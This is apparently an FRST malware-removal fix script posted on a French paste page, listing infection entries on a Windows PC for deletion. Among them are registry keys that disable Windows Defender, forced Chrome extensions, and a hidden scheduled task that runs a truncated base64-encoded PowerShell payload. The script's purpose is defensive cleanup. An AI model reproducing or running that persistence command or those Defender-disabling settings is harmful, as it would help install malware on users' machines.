Édité le 21 juillet 2022
Télécharger | Reposter | Largeur fixe

start::
closeprocesses:
createrestorepoint:
virustotal: C:\Users\antwe\AppData\Roaming\Energy\Energy.exe
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact
HKU\S-1-5-21-4029300296-1889171598-789098023-1001\...\Run: [Energy] => C:\Users\antwe\AppData\Roaming\Energy\Energy.exe [134389817 2022-05-12] (Energy Technologies) [Fichier non signé] <==== ATTENTION
C:\Users\antwe\AppData\Roaming\Energy\Energy.exe
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-10-24] (Apple Inc.) [Fichier non signé]
HKU\S-1-5-21-4029300296-1889171598-789098023-1001\...\MountPoints2: {25c710d2-c0bc-11eb-b0bc-f8ac652a524b} - "G:\setup.exe"
HKU\S-1-5-21-4029300296-1889171598-789098023-1001\...\MountPoints2: {25c711ed-c0bc-11eb-b0bc-f8ac652a524b} - "H:\setup.exe"
HKU\S-1-5-21-4029300296-1889171598-789098023-1001\...\MountPoints2: {25c715c5-c0bc-11eb-b0bc-f8ac652a524b} - "I:\setup.exe"
HKU\S-1-5-21-4029300296-1889171598-789098023-1001\...\MountPoints2: {25c715e9-c0bc-11eb-b0bc-f8ac652a524b} - "J:\setup.exe"
HKLM\Software\Microsoft\Active Setup\Installed Components: [{052EB454-9F19-CB42-7875-807F79F311C4}] -> C:\Program Files (x86)\CCleaner Browser\Application\103.0.17593.116\Installer\chrmstp.exe [2022-07-14] (Piriform Software Ltd -> Piriform Software)
Task: {8BCFC30F-CAFB-4963-A374-2D590B7BE597} - System32\Tasks\chrome panel => cmd /c powershell -WindowStyle Hidden -E "CgAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAJABzAHQAcgBBAHMAYwBFAG4AYwBUAGUAeAB0AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKACQAagBkACAAPQAgACQAbgB1AGwAbAA7AAoACgAKAGYAdQBuAGMAdABpAG8AbgAgAGcAZQB0AE4AZQB3AFAAcgBvAHAAKABbAH (l'élément de données a 5019 caractères en plus). <==== ATTENTION
Task: {A6F23B1F-DAE7-41F1-9A53-74FDED95E78C} - \Opera scheduled assistant Autoupdate 1652334224 -> Pas de fichier <==== ATTENTION
Task: {FE0D6049-E7C4-4F64-BA8A-66339B737E2A} - System32\Tasks\Opera scheduled Autoupdate 1652334223 => C:\Users\antwe\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3: <==== ATTENTION (Restriction - Zones)
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]
CHR Extension: (Properties) - C:\Users\antwe\AppData\Local\chrome_bookmarks [2022-06-06]
C:\Users\antwe\AppData\Local\chrome_bookmarks
S2 AvgWscReporter; "C:\Program Files\AVG\Antivirus\wsc_proxy.exe" /runassvc /rpcserver [X]
S3 netprotection_network_filter2; System32\drivers\netprotection_network_filter2.sys [X]
emptytemp:
end::

x
Éditer le texte

Merci d'entrer le mot de passe que vous avez indiqué à la création du texte.

x
Télécharger le texte

Merci de choisir le format du fichier à télécharger.